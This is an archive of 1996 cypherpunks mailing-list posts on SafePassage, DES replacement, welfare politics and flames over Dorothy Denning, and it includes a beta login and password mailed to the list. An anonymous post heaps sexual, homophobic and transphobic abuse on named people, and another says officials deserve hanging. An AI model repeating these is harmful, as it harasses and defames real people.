Date: Wed, 27 Nov 1996 00:15:54 -0800 (PST)
To: Douglas Barnes <cman@c2.net>
Subject: Re: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
In-Reply-To: <2.2.32.19961126212424.00cba538@blacklodge.c2.net>
Message-ID: <9611270712.aa22352@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Douglas Barnes wrote:
> 
> 
> >>       SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
> >
> >BTW, this doesn't come with source code.
> >
> 
> No, it does not come with source code. Site licenses and OEM
> bundling packages will come with a source code option. Partners
> who work with us in internationalizing the product may also
> receive source code. However, it did not seem to be useful or
> appropriate for a consumer-level product like this.
> 
> We are trying to find a happy medium between making sure that the
> security is well-reviewed, and doing things that make business
> sense and map onto standard industry practice for selling software
> products. 

Really? Who reviewed the security of SafePassage?

> 
> Note that SafePassage uses SSLeay for its encryption and SSL
> protocol layer; SSLeay has publicly available source code, and has 
> been extensively reviewed.

I've never seen a security review of SSLeay, and if anyone gave it a clean bill
of health, they didn't have their eye on the ball. Note, I'm not knocking
SSLeay here, it is a wonderful lump of code, but it hasn't been written with
security in mind (IMHO).

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jim@santafe.arch.columbia.edu>
Date: Wed, 27 Nov 1996 04:40:47 -0800 (PST)
To: tz@execpc.com
Subject: Re: wealth and property rights
In-Reply-To: <Pine.LNX.3.95.961126110818.4290A-100000@deimos.ceddec.com>
Message-ID: <Pine.NEB.3.94.961127071424.513A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Nov 1996, Tom Zerucha wrote:

> 2. In a socialist society wealth is confiscated at gunpoint.  In a
> capitalist society, I have to provide something that you want more than
> your wealth in order to obtain it.  Bill Gates has lots of money because

You are confusing the difference between capitalism and socialism with that
between authoritarianism and anarchism.  If you think that money isn't taken
at gunpoint in this society, try not paying taxes for a while...  Or more
subtly and more brutally, try not paying for food and shelter for a while...

Conversely to suggest that all socialist economies rely on state enforcement
contradicts generations of communal life among groups such as the Amish...

A more accurate division, if you are looking for sweeping generalizations,
is to say that all statist systems (and it is immaterial to me whether the
state calls itself a `government', a `collective', or a `corporation')
sustain themselves by theft, while in a free society, a more open system
is possible.

Were a truly free society to exist, you or I could choose our own economic
system, rather than being coerced into whatever system is profitable for
those currently in power.  I tend to believe that a communal existance
under such circumstances would be ideal.  I suspect you would seek for
capitalism.  So be it.  Of course, whether a system such as ours could
survive without the national guard, an army, and a police state to keep the
lower classes in line is another question...

> 4. When you say wealth isn't being transferred, it is also generally
> untrue.  While someone may be controlling it, their control is usually not

Each year a smaller percentage of the population controls a larger percentage
of the wealth, while the income and holdings of the average citizen drops.
Wealth certainly is being transferred...  In the wrong direction.

> 5. Government is the least efficient means of resolving the problem.  The

I doubt you'll find very many (any?) on cypherpunks who would contest this.
Again, you are confusing the difference between socialism and capitalism
with that between statism and anarchism.

> current welfare system is such that simply transferring the budget of all
> the programs would make every poor person middle class.  Confiscating the
> wealth of the rich would likely be used employ more people generating
> endless debates about who to give it to, than actual beneficiaries.  You

Actually there are plenty of beneficiaries.  Mostly corporate.

You do realize, I assume, that three times as much of your tax money goes
to corporate welfare than to actual welfare...
[Source: Michael Moore, ``Big Welfare Mamas'', in _Downsize_This_, NY 1996]

--
				Jim Wise
				System Administrator
				GSAPP, Columbia University
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 27 Nov 1996 07:52:25 -0800 (PST)
To: denning@cs.georgetown.edu
Subject: Re: Dorthy Denning is a boot-licking fasicist!!!
Message-ID: <199611271552.HAA29224@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


"William H. Geiger III" <whgiii@amaranth.com> writes:

>I don't know if anyone watched the House Subcomitty on Computers &
>Technology today on C-Span.

No, we watched 'Dorothy does Georgetown" on C-Spam.

>Phil Zimmerman, Dorthy Denning, William Reinsch & others were disscussing
>computer security.
>
>Dorthy Denning gave the most pro-government speech I have ever heard. Is
>this clueless bitch on the government payroll?!!

Yes.

>William Reinsch is a lying bastard. Fucking politions!! Fucking
>goverment!! They all deserve a long rope!!

Start with Socks the queer cat.

>Phil Zimmerman was quite good at attacking the government policies.
>
><sigh> We are truly a country of fools to have put these jackbooted
>facisit bastards back into office.

"Dorothy Denning" is a man in drag. "She" has a bigger dick that
"her" boyfriend John Gilmore, the cocksucker faggot from EFF.

>-----------------------------------------------------------
>"William H. Geiger III" <whgiii@amaranth.com>
>-----------------------------------------------------------

Just say GAK to chicks with dicks!

diGriz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <olbon@ix.netcom.com>
Date: Wed, 27 Nov 1996 05:21:01 -0800 (PST)
To: Stephen Boursy <boursy@earthlink.net>
Subject: Re: wealth and property rights
Message-ID: <1.5.4.32.19961127131858.006ebe30@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:08 PM 11/26/96 -0500, Stephen Boursy <boursy@earthlink.net> wrote:
>  I sincerely don't believe that.  If you look at your above
>examples, or Bill Gates below, much of their motivation is not
>the accumulation of weath per se but rather power and performance.
>I know I would do much the same job (not that I'm in the wealthy)
>even if the salary were more or less--I enjoy it (I'm a programmer).
>Same is true for education--much of the motivation is either 
>intrinsic or status oriented and has little or nothing to do with
>marketablity.

This is provably bullshit.  Look at the HUGE numbers of people in this
country who make the economic decision to do nothing and go on welfare vs.
going to work.  Examine carefully the economic performance of the US vs the
Soviet Union - two countries with quite similar natural resources and
population.  To believe as you do belongs in the same category as believing
in the tooth fairy and Santa Claus.  It requires complete ignorance of reality.

>> In a capitalist society, I have to provide something that you want 
>> more than your wealth in order to obtain it.  
>
>  That's true--as with all labor--but it is a matter of scale.  
>Gates would do the same thing if you limited his income just
>for the sake of power accumulation--he's got all the money
>he could ever consume.  That's not his real motive.

More bullshit.  You don't know what anyones motives are.  To ascribe your
motivations to Bill Gates is unrealistic.  

What is your defined limit on what people should earn?  A thought
experiment.  The govt decides that the maximum anyone can earn in a lifetime
is $10M.  Bill Gates earns his $10M, he then decides that he doesn't feel
like working for free, so he quits.  Pretty soon, the people most effective
at creating wealth in society will all "reach their limit" and quit.  Then
the economic growth rates in this country can approach those of the
socialist societies that you seem to adore.  Either that or the best and
brightest will leave.  
 

>> 5. Government is the least efficient means of resolving the problem.  The
>
>   As inefficeint as it is it is really the only effective means.  A
>simple 100% inheritance tax would be very helpful as would limitations
>on how much property a given individual (and a corporation is a virutal
>individual) may own.

See my above points.  Implement this and prepare the for US to become a
third world country.  100% inheritance taxes would probably be the largest
incentive for people to leave (they leave now with ONLY a 50% inheritance
tax).  And who would get the money?  Those who are producing nothing, giving
them even greater incentives for producing nothing (heck, get welfare
payments up around $50K and I would quit work - I could find lots of
enjoyable and intellectually stimulating ways to keep myself busy!).


>  As to your other issue here--earnings and limitations on accumulation,
>much would be equalized without inheritance.  But yes--there would
>still be accumulators--most would still produce regardless of
>limits because as I said their motives are not simply income--power,
>prestige, etc. all come in to play as well as the gratification that
>comes with winning.  Gates enjoys his cover on Time Mag. much more
>than a few extra million a day.

Bullshit.  See above.

>  But the basic answer to your argument--from my standpoint--is that
>some people are extremely intellegent, others very gifted in other
>ways, others very dull witted, etc.  Some possess artistic genius
>that can pay off immediately, others have none that is valued dollar
>wise by society.  I sincerly don't believe one has the right to
>live better than the other--that the rewards, if different, sould
>be negligable.  
>
>  If I could make as much as I do know programming by working as
>a clerk in a convenience store or whatever I would still choose to
>do what I am doing.  If you are in a different situation you're
>in the wrong career.

You are extremely idealistic.  Try coming back to reality.  Examine the
"test cases" for the policies you advocate (and there are plenty of examples
of socialist policies both in this country and others) - and realistically
assess the consequences.  If you do this, you will find that these policies
are unworkable, and lead to lower - not higher standards of living for
everyone.  

        Clay
*******************************************************
Clay Olbon			    olbon@ix.netcom.com
engineer, programmer, statistitian, etc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Kozubik <kozubik@shoelace.FirstLink.com>
Date: Wed, 27 Nov 1996 07:25:34 -0800 (PST)
To: Anonymous <nobody@replay.com>
Subject: Re: your mail
In-Reply-To: <199611262152.WAA01587@basement.replay.com>
Message-ID: <Pine.SOL.3.91.961127081839.6595A-100000@shoelace.FirstLink.com>
MIME-Version: 1.0
Content-Type: text/plain



> >> This betrays your ignorance.  I.Q. is scaled according to age.  One does
> >> not "improve."

I am new to the list, and I was going to just sit and absorb for a few 
weeks, but....

Yes, the IQ scale that we generally refer to is based on age, ie. a 10 
year old and a 5 year old that perform equally will have different IQ scores.

However, it is now generally accepted in the psychology field that your 
brain can degrade or improve over time based on the stresses placed upon 
it.  Basically what this means is that your brain is like a muscle, and 
the more you use it, the higher your IQ becomes.

Contrary to popular armchair psychology, there is no significant evidence 
that IQ and age are inversely related.  In general, however, the older we 
get, the less we use our brain, and it becomes like a muscle that we no 
longer use.

The point: Yes, you can improve your brain, and you can take proactive 
steps to increase your IQ.

(back to lurk mode)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 27 Nov 1996 07:18:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Star Trek: First Contact
In-Reply-To: <199611270201.SAA29256@mark.allyn.com>
Message-ID: <4g12XD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark Allyn 206-860-9454 <allyn@allyn.com> writes:

> Are any of the characters in the new Star Trek gay?

The bold guy who plays Captain Picard is very gay in real life.
(He probably hated all those love episodes with women :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Wed, 27 Nov 1996 05:35:57 -0800 (PST)
To: attila@primenet.com
Subject: Re: Another Nutty Idea about SPAM
In-Reply-To: <199611270417.VAA15665@infowest.com>
Message-ID: <Pine.LNX.3.95.961127083929.386A-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996 attila@primenet.com wrote:

>         well, I've always figured that people are basically OK 
>     until proven otherwise --or their is money involved. 
>         then there are lawyers....
> 

</devil's advocate mode>

That's the crux of my point.  The spammer's fundamental motivation is money.
People who don't want to receive bulk mailings won't spend money with the
spammers.  However, many spammers don't see it that way.  "What's in it for
me?"  ie. who's gonna pay the spammer for NOT sending his bulk e-mail just
because some folks don't want it.

</end devil's advocate mode>

me
_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Wed, 27 Nov 1996 07:34:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: TIA Invites
Message-ID: <9611271528.AA15128@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: John Young <jya@pipeline.com>
>
> A rep of the Telecommunications Industry Association
> telephoned to say that TIA has invited authority to 
> investigate disclosure of TIA's TR45.3 to the unworthy.
> 
> 

Did I miss something... What is this disclosure of TR45.3 about?

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 27 Nov 1996 07:53:46 -0800 (PST)
To: whgiii@amaranth.com (William H. Geiger III)
Subject: Re: Today's hearing (Re: Dorthy Denning is a boot-licking fasicist!!!)
In-Reply-To: <199611271624.KAA30828@mailhub.amaranth.com>
Message-ID: <199611271610.KAA00236@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


>    at 06:34 AM, snow <snow@smoke.suba.com> said:
> >     Well, it's been said before, you are know by the company you keep. 
> <sigh> well after my survivalist training & military training in the '80's
> I thought I was well prepaired for those dam Ruskies. Seems the way things
> are going I am going to need them for those dam Americans. Who Knew

      Some people kinda suspected it would happen. I mean, when I was 
in the military, and I looked at the goons I was serving with, I realized
what the enemy was.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 27 Nov 1996 10:10:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Counterproductive Dorothy Denning Flames
Message-ID: <199611271810.KAA02393@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


William H. Geiger III writes:

 > Dorthy Denning is a boot-licking fasicist!!!

 > William Reinsch is a lying bastard. Fucking politions!!
 > Fucking goverment!! They all deserve a long rope!!

It is perhaps a point in Dr. Denning's favor that her most
vitriolic detractors can spell neither "Dorothy" nor "fascist".

I must admit that I am at a loss to understand the heat which
Dorothy Denning generates on the Cypherpunks list, which seems to
be second only to the heat generated by posting recipes for roast
feline in rec.pets.cats.

All of the people I know who have met her find her to be a
pleasant person, and the occasional Email messages we have
exchanged have certainly been positive and friendly.  While she
tends to view the Four Horsemen of the Infocolypse as a bit more
threatening than the typical Cypherpunk, I don't think her views
are so extreme as to justify the continuous screams of "crypto
toady", "government suckup", and "wicked witch" which seem to pop
up in response to her every utterance.

I would even go so far as to say that this list would be a lot
more entertaining if she were contributing to it, and sci.crypt
is certainly a less interesting place now than it was in bygone
days when she was posting there.

Perhaps Tim can add his own thoughts to this thread. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Wed, 27 Nov 1996 07:12:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Today's hearing (Re: Dorthy Denning is a boot-licking fasicist!!!)
In-Reply-To: <199611271234.GAA03465@smoke.suba.com>
Message-ID: <199611271626.KAA30854@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199611271234.GAA03465@smoke.suba.com>, on 11/27/96 
   at 06:34 AM, snow <snow@smoke.suba.com> said:

>> On Tue, 26 Nov 1996, William H. Geiger III wrote:
>> > Dorthy Denning gave the most pro-government speech I have ever heard. Is
>> > this clueless bitch on the government payroll?!!
>> > William Reinsch is a lying bastard. Fucking politions!! Fucking
>> > goverment!! They all deserve a long rope!!
>> Settle down.  Neither of them was _that_ bad... just business as usual.

>     Business as usual is _that_ bad.

>> > <sigh> We are truly a country of fools to have put these jackbooted
>> > facisit bastards back into office.
>> 
>> Neither Denning nor Reinsch is an elected official.  Any president we
>> elect, unless they run with a specific pro-crypto plank in their platform
>> will do the same thing...they're all in bed with the LEA's.

>     Well, it's been said before, you are know by the company you keep. 

<sigh> well after my survivalist training & military training in the '80's
I thought I was well prepaired for those dam Ruskies. Seems the way things
are going I am going to need them for those dam Americans. Who Knew

-- 
-----------------------------------------------------------
"William H. Geiger III" <whgiii@amaranth.com>
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Wed, 27 Nov 1996 07:24:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Re: wealth and property rights
In-Reply-To: <009ABBF7.ACB06A80.64@SPRUCE.HSU.EDU>
Message-ID: <199611271638.KAA30991@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <009ABBF7.ACB06A80.64@SPRUCE.HSU.EDU>, on 11/22/96 
   at 12:18 PM, jc105558@spruce.hsu.edu said:

>> Btw, people of your mentality (communists/socialists) already make it
>> very difficult for me to accumulate, due to the exhorbitant tax rates
>> to support those who chose to blow their money as soon as they have
>> it

>I don't necessarily want to support "socialism" nor "capitalism". Both
>are extremes of a situation which does no one any good to exist. 

>However, I would question the implication that "socialists" are
>responsible for the higher tax rates you currently experience.  

>For example, I could make a strong case that you really have some clever
>"capitalists" who have learned how to express their
>"capitalism" quite effectively across the space of all people in a
>"country".

What a crock!!

socialist/communist are theifs; plain & simple. They beleive they have the
right to steal from one to give to another. 

capitalists beleive in an exchange in property/services at a rate the
market will bare.

socialists example: You have somthing I want/need & I am going to take it
from you.

capitalists example: You have somthing I want/need what can I give you in
exchange.

socialism uses FORCE to take what it wants while the capitilism you have a
free & volintary exchange.

why is this so hard to understand??

-- 
-----------------------------------------------------------
"William H. Geiger III" <whgiii@amaranth.com>
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Wed, 27 Nov 1996 10:51:30 -0800 (PST)
To: Clay Olbon II <olbon@ix.netcom.com>
Subject: Re: wealth and property rights
In-Reply-To: <1.5.4.32.19961127131858.006ebe30@popd.ix.netcom.com>
Message-ID: <Pine.LNX.3.95.961127104249.550B-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996, Clay Olbon II wrote:
> 
> This is provably bullshit.  Look at the HUGE numbers of people in this
> country who make the economic decision to do nothing and go on welfare vs.
> going to work.  Examine carefully the economic performance of the US vs the

I don't know how much people get on welfare in your country but I
suspect that it is even less than in this country (Canada). Anyone who
truly believes that people make the `economic decision to do nothing and
go on welfare vs. going to work' has, in my opinion, no &^%* idea what
they are talking about. Just try to *live* on a welfare wage for a few
months to see how silly this thought is. While there may well be a few
`welfare-moms' (which is not necessarily a bad thing, taking care of
children is an investment for society), the vast majority of people on
welfare (at least here)  would *much* rather get a decent job and work
for their money. There are, perhaps, a few people who would rather not
work for minimum wage (who find it impossible to feed their family on
that) but I suspect that those folks are few and far between. 

[...]
 
> More bullshit.  You don't know what anyones motives are.  To ascribe your
> motivations to Bill Gates is unrealistic.  

But you claim to know the motives of those on welfare: pot->kettle->black

Just to be clear, I don't really agree with the original points being
made, but your views seem just as far off as the ones you are opposing, 
perhaps further. 

cheers, kinch






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Wed, 27 Nov 1996 11:31:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: PBS Re-runs...
Message-ID: <3.0.32.19961127113058.00eef880@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


PBS locally was rerunning an episode of "Life on the Internet" last night.
It was the one about PGP and Phil Zimerman.

It was pretty old (by net standards).  Phil had just gotten his case
dropped.  (And they mentioned the FBI's "Search for the Unibomber" page.

What I found frightening about the whole thing was Jim Kalstrom's comments
during the whole thing.  He brought up the Four Horsemen, as well as their
brothers, cousins, sisters, and the contents of a large family horseman
reunion.  He kept mentioning as to how we had to be able to tap CRIMINALS.
What he never mentioned is who those suspected criminals are.  ("We have
met the enemy and they is us!")  Personally I found the argument on the
government side pretty weak.  (My wife's comment was that they got lazy
using all these newfangled toys and did not want to have to get back to
doing real police work and real investigations.)  Kalstrom made it pretty
clear by his own words that he wanted to "catch the bad guys" and he did
not care what rights he trod on doing it.

Phil came off real well on the program.

The one thing that failed to mention is the amount of foreign development
that has gone into PGP.  (As well as the availability of it at sites around
the world.)


---
|              "Remember: You can't have BSDM without BSD."              |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 27 Nov 1996 12:01:33 -0800 (PST)
To: "Robin Whittle" <firstpr@ozemail.com.au>
Subject: Hurray!  A good example of rational thinking ...
In-Reply-To: <199611271154.WAA26338@oznet02.ozemail.com.au>
Message-ID: <199611272000.MAA18790@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: Robin Whittle
>
> > Dorthy Denning is a boot-licking fasicist!!!
>
> It may be emotionally satisfying to rail against (what for us may be
> evident as) the wickedness and stupidity of our opponents.
> [SNIP]
> If we nod our heads to "Dorthy Denning is a boot-licking fasicist!!!"
> then we too are succumbing to groupthink.

I must commend Robin for a well-said comment.

It is truly counter-productive to insist on conspiracy theories and
anti-government rhetoric.  Sure, there have been conspiracies in the
past.  Sure, there have been more than our fair share of atrocities.

However, the real issues are privacy, security, freedom of speech, and
effective policy enforcement.  When we start calling names like "jack
booted thugs" and the like, we are sinking to the same low levels that
Freeh and (more appropriately) Gorelick use when they cry wolf and
foretell futuristic electronic meltdowns.

More importantly, while the public is cynical and skeptical, it isn't
exactly embracing the right-wing militia movements either.  It would
be a great disservice to the cause if cypherpunks were, in the minds
of the public, tightly associated with the likes of Timothy McVey.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Wed, 27 Nov 1996 12:45:09 -0800 (PST)
To: Clay Olbon II <olbon@ix.netcom.com>
Subject: Re: wealth and property rights
In-Reply-To: <1.5.4.32.19961127200939.006d71c0@popd.ix.netcom.com>
Message-ID: <Pine.LNX.3.95.961127123103.550D-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996, Clay Olbon II wrote:
> 
> The average welfare benefit (including food stamps, medicaid, and all the
> other myriad programs) is $10/hr.  Compare to a minimum wage of $5/hr.
> Offer most welfare recipients a minimum wage job and they will laugh in your
> face.  (In fact, here in Michigan most employers are already paying several
> $$ above minimum wage, and often these jobs are unfilled).

I am not in a position to argue with you, I simply don't have the facts.
My question is, do You? can you cite where this figure came from, it
sounds like Republican rhetoric to me. Of course, I will point out, that
minimum wage is simply not enough to feed a family. It is (or at least
it should be) reserved for single folks just starting out. 
> 
> >> More bullshit.  You don't know what anyones motives are.  To ascribe your
> >> motivations to Bill Gates is unrealistic.  
> >
> >But you claim to know the motives of those on welfare: pot->kettle->black
> 
> I don't claim to know the motives.  I am examining empirical evidence.  As

Sure you do: "economic decision to do nothing and go on welfare vs.
going to work". It seems to me that you are claiming their motives are
econmic, is there some other way we should read that sentence?

> the welfare benefit increases, more go on welfare, as it decreases, less go
> on welfare.  Someone is making economic decisions, consciously or
> unconsciously.  

It takes an awful lot to prove a causal relationship, empirical evidence
notwithstanding. You haven't made your case, as far as I am concerned
(not that you need to convince me), there are a myriad of other factors
involved. I have no doubt that given two (or three) poor choices, most
will choose the lesser evil and that *may* mean choosing welfare over
working, but I seriously doubt that this is anything but a small
minority of the cases of people who are actually using the system.

You suggest that what ought to be done is give less welfare. If your
thesis is correct, I suggest that better paying jobs is the real answer
(assuming you agree that minimum wage is too little for most to live
on). Shrinking welfare payouts may serve to get people off welfare but
it won't make it any easier to live on low wages. We DO have a duty to
help our neighbours, do we not? Or has greed taken over entirely?

I repeat, however, I do not know enough about your system and I am going
to just shut up about it now.

cheers, kinch






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ca3sal@isis.sunderland.ac.uk (Stephen.George.Allport)
Date: Wed, 27 Nov 1996 05:23:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [CRYPTO] Bank Cards, Interac, Bank Machines, etc
Message-ID: <199611271317.NAA04913@cis506.cis.sund.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


There was someone jailed a couple of months ago in the UK for ATM fraud.
He and his mates set up cameras watching people type in there PIN number and 
then manufatered dummy cards. I will try and dig out any more info.

Ste




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at CNET, THE COMPUTER NETWORK (1.8b)"              <LISTSERV@DISPATCH.CNET.COM>
Date: Wed, 27 Nov 1996 13:51:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Your request to sign off the DISPATCH list
Message-ID: <199611272151.NAA17141@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Wed, 27 Nov 1996 13:49:02


Hi,

If you're reading this message, then you  must have tried to reply to the
Digital Dispatch  or to one  of the  Shareware Dispatches. These  are all
read-only mailing lists.

If you  are trying to subscribe  or unsubscribe to a  Shareware Dispatch,
please follow  the instructions given  near the  end of your  most recent
dispatch, the procedure for eash list is slightly different.

If you're trying to subscribe or  unsubscribe, to Digital Dispatch, or if
you have changed  email addresses and would like to  receive mail at your
new address, please follow these instructions exactly:

1. To unsubscribe, send a message to dispatch@cnet.com with the following
in the body:

unsubscribe me@somewhere.com

For example unsubscribe janedoe@whatsup.com

Your name will be automatically be dropped from our distribution list.

2. To  subscribe a  new email  address in the  case of  a change,  send a
message from the account that  you wish to subscribe to dispatch@cnet.com
with the following in the body:

subscribe me@somewhere.com

For example subscribe janedoe@whatsup.com

Your name  will be automatically be  added to our distribution  list, and
you'll start receiving Digital Dispatch the very next week.

3. If  you have previously  attempted to unsubscribe without  success you
may have several usernames or aliases, or perhaps you're having your mail
forwarded from one machine to another. If this is the case, please follow
the instructions in the email message  you received from the "L-Soft list
server at C|NET: the computer network (1.8b)".

4.  If you  any questions  which  are not  answered here,  please send  a
message to support@cnet.com


Thanks for writing.

c|net's support staff-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at CNET, THE COMPUTER NETWORK (1.8b)"              <LISTSERV@DISPATCH.CNET.COM>
Date: Wed, 27 Nov 1996 13:52:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Output of your job "cypherpunks"
Message-ID: <199611272151.NAA17143@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> signoff dispatch
You are not subscribed to the  DISPATCH list under the address your message
came  from (cypherpunks@TOAD.COM).  You  are being  mailed some  additional
information with a few hints on getting your subscription cancelled. Please
read these instructions before trying anything else.

Summary of resource utilization
-------------------------------
 CPU time:        0.020 sec
 Overhead CPU:    0.020 sec
 CPU model:         2xPentium (192M)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 27 Nov 1996 10:56:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: NIST seeks DES replacement.
Message-ID: <199611271856.KAA12134@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


See:

http://www.fcw.com/pubs/fcw/1111/des.htm

Federal Computer Week, Nov 11, 1996.

"DES set for overhaul." by HEATHER HARRELD

The content is kind of thin, but it amounts to a statement that
NIST is preparing a Federal Register request for a successor to
DES. Most the article concerns the termendous hassle replacing
DES will be for government agencies (FCW is a trade rag for people
working with computers in the Federal and State sectors - I used to
get it when I was at MITRE.)

There's a truely clueless comment at the end, where Mike Schwartz
of "Prime Factors Inc., an Oregon-based security firm" is quoted
as saying "...DES shows no signs of weakening."

-----------------------------

While 3DES-EDE is the obvious replacement, it would be far from an
easy switch, since there are a huge number of fielded devices for 
handling the 64 bit single DES keys.

I wonder how good a drop-in replacement could be made
if the goal was to NOT have to replace the key handling 
infrastructure - just replace a single software module or chip.

If we use the bits currently devoted to parity in DES keys for
actual key data, we gain 8 bits, or a factor of x256 in the keyspace.

If we further complicate the key schedule setup, so it's much slower 
than DES in both hardware and software (lots of rotates, multiplies, 
state, etc), we can make life a lot more difficult for brute force attacks.

Maybe some version of Blowfish, using the same key twice - I have
not studied Blowfish, so I don't know if this introduces an obvious
weakness.

Happy Thanksgiving!

Peter Trei
trei@process.com

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Napalm <sfnf9uy@scfn.thpl.lib.fl.us>
Date: Wed, 27 Nov 1996 11:40:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: PO-2 Brain wave meters.
Message-ID: <Pine.SUN.3.95.961127135855.800A-100000@scfn>
MIME-Version: 1.0
Content-Type: text/plain


Has NE1 heard of these things? Supposedly you plug it into your printer
port and it shows you your brain waves so you can try to reach "alpha"
waves or something. I think they cost around $500.
If it`s for real you could do some neat things with it; how bout your
computer waking up when you wake up...
	that terminator 2 plot comes closer every day....
NEway if anybody knows anything about it let`s have it.
 L8R	-Napalm					SFNF9UY@SCFN.THPL.LIB.FL.US





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SafePassage Downloader <stronghold@ukweb.com>
Date: Wed, 27 Nov 1996 06:08:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Your login/password for SafePassage beta
Message-ID: <199611271407.OAA14579@www.ukweb.com>
MIME-Version: 1.0
Content-Type: text/plain


You can now download SafePassage. You'll need the following login/password:

Login: cypherpunks@toad.com
Password: 2xLBsxut

Go to http://stronghold.ukweb.com/safepassage/ and select "Download" -- 
you'll be prompted for your login/password, after which you'll be able to
download the software.   Make sure you keep your login/password
private.   Revealing your login/password to anyone is a violation of the
license agreement.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
